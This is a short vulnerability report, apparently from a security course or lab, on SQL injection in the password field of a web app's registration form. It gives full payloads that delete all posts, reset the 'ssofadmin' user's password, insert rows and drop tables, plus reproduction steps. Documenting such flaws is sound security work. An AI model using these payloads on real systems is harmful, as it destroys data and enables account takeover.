# Vulnerability 3: SQL injection in parameter `password`

- Vulnerability: SQL injection
- Where: `password` parameter of register
- Impact: Allows execution of any query on the database in the POC we will delete all posts from the database

## Steps to reproduce

1. Register a user with `username`=`test` and `password`=`testing`
2. Verify there are posts available
2. In a seperate session, register a new user with `username` = `anything` and `password`=`a'); DELETE FROM Posts; DROP table posts # ` in register form
3. Reload the feed in the first session and verify there are no posts

[(POC)](vuln3.py)

**Note:** The last instruction of the payload `DROP table posts` is needed for the query to be executed but is not actually performed by the database because table `posts` doesn't exist

## Other Payloads:
Examples of queries of each type:
- UPDATE query: `password`=`abc'); UPDATE Users SET password='a' WHERE username='ssofadmin'; DROP table posts # ` (change password of user `ssofadmin` to `a`, exemplified with similar payload in [register #2](vuln2.md))
- INSERT query: `password`=`abc'); INSERT INTO Friends(username1, username2) VALUES ('a', 'b'); DROP table posts # ` (add username `a` as friend of username `b`), exemplified with similar payload in [request_friend #1](../request_friend_vulns/vuln1.md))
- DROP query: `password`=`abc'); DROP table Posts; DROP table posts # `(drops table Posts), exemplified with similar payload in [pending_requests #1](../pending_requests_vulns/vuln1.md))